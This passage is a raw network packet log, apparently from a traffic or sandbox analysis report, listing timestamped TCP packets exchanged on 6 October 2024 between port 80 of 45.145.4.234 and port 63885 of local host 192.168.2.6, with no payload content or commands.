                                                                                                                                                Oct 6, 2024 22:18:49.485234976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.485256910 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.485282898 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.485445023 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.485445976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.485450983 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.485461950 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.485471964 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.485485077 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.485500097 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.485532045 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.485532045 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.485783100 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.485793114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.485802889 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.485814095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.485821962 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.485852003 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.485969067 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.485981941 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.485992908 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.486012936 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.486027956 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.486141920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.486154079 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.486166954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.486177921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.486179113 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.486195087 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.486212969 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.486313105 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.486324072 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.486356020 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.565311909 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565335989 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565354109 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565395117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565407038 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565418959 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565429926 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565440893 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565469980 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.565524101 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.565526009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565543890 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565556049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565563917 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.565596104 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.565620899 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565632105 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565649033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565655947 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.565687895 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.565789938 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565802097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565814018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565824986 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.565851927 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.565953970 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.565989971 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.566047907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.566060066 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.566082954 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.566098928 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.566175938 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.566211939 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.566230059 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.566241980 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.566262960 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.566277981 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.566306114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.566318989 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.566334009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.566339970 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.566356897 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.566376925 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.566543102 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.566581011 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.566639900 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.566649914 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.566673040 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.566688061 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.566862106 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.566874027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.566886902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.566926003 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.566926003 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.566997051 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.567008972 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.567018032 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.567029953 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.567056894 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.567327023 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.567364931 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.567373037 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.567390919 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.567405939 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.567428112 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.567462921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.567498922 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.567595959 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.567642927 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.567656040 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.567667961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.567709923 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.567709923 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.567723036 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.567739010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.567749023 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.567759991 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.567790985 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.567790985 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.567928076 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.567939043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.567949057 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.567977905 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.568002939 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.568015099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.568026066 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.568034887 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.568049908 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.568068981 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.568423986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.568434954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.568449974 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.568471909 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.568487883 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.568588972 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.568620920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.568629026 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.568629980 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.568650007 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.568665981 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.568727016 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.568739891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.568751097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.568763971 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.568783998 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.568871975 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.568882942 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.568895102 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.568903923 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.568929911 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.568980932 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.568993092 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569004059 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569017887 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.569044113 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.569104910 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569116116 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569124937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569139004 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.569165945 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.569231033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569242001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569251060 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569278002 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.569292068 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.569437027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569472075 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.569509983 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569519997 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569541931 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.569556952 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.569617987 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569628954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569638968 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569652081 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.569665909 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.569684029 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.569839001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569874048 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.569941998 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569952011 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569984913 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.569988966 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.569999933 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.570003033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570014000 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570028067 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.570048094 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.570126057 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570137024 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570168018 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.570240974 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570250034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570286989 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.570369005 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570380926 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570390940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570417881 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.570430994 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.570493937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570504904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570514917 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570528984 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.570544958 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.570616961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570627928 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570642948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570651054 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.570677996 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.570892096 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570935965 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.570943117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570954084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.570976019 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.570991039 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.571002007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571014881 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571024895 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571038008 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.571055889 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.571141958 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571155071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571163893 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571176052 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.571204901 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.571330070 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571361065 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571369886 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.571371078 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571394920 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.571409941 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.571577072 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571619034 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.571649075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571660042 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571688890 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.571705103 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571718931 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571727991 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571733952 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571752071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571767092 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.571803093 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.571813107 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571844101 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.571856976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571867943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571878910 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571888924 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.571902990 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.571902990 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.571923018 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.571934938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.572060108 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.572097063 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.572105885 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.572117090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.572137117 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.572150946 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.572333097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.572364092 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.572375059 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.572376966 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.572402000 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.572412014 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.572982073 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.573003054 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.573014021 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.573026896 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.573093891 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.573689938 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.573731899 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.573792934 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.573837042 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.573862076 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.573894024 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.573908091 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.573919058 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.573940992 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.573990107 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.652050972 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.652074099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.652084112 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.652107954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.652118921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.652128935 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.652139902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.652196884 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.652228117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.652250051 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.652266026 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.652549982 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.652597904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.652609110 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.652609110 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.652635098 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.652650118 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.682840109 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.687767029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.858464003 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.858494043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.858505011 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.858534098 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.858545065 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.858555079 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.858553886 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.858592987 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.858622074 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.858783960 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.858824015 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.858855963 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.858866930 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.858896017 CEST6388580192.168.2.645.145.4.234
